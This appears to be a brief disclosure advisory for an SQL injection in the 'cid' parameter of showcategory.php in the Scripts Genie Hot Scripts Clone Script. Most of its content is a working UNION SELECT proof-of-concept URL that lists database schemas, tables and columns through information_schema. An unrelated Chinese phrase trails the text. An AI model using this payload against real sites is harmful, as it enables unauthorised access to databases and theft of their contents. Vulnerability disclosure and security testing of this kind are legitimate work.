-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=- + Security Flaw+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=- + __ _ + + _________ _ _/\ \ \___| |_ + +/ __|/ _ \/ __| | | |/\/ / _ \ __|+ +\__ \__/ (__| |_| / /\/__/ |_ + +|___/\___|\___|\__,_\_\ \/ \___|\__|+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+ +Scripts Genie Hot Scripts Clone Script+ +SQL Injection Vulnerability PoC + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+ + Discovered by Easy Laster+ +Autor : Easy Laster + + Date :17.02.2013 + +Script:Scripts Genie+ +Hot Scripts Clone Script+ +scriptsgenie.com+ + Price::$1.75 + +Language: PHP + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= +Vulnerability + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= +hutscripts/showcategory.php?cid=[SQLi]+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= + Proof of Concept + +Crawling the MYSQL Stack+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= /hutscripts/showcategory.php?cid=21+uni on+select+1,concat_ws(0x3a,table_schema ,table_name,column_name),3,4,5+from+inf ormation_schema.columns+limit+180,1--+
体验盒子
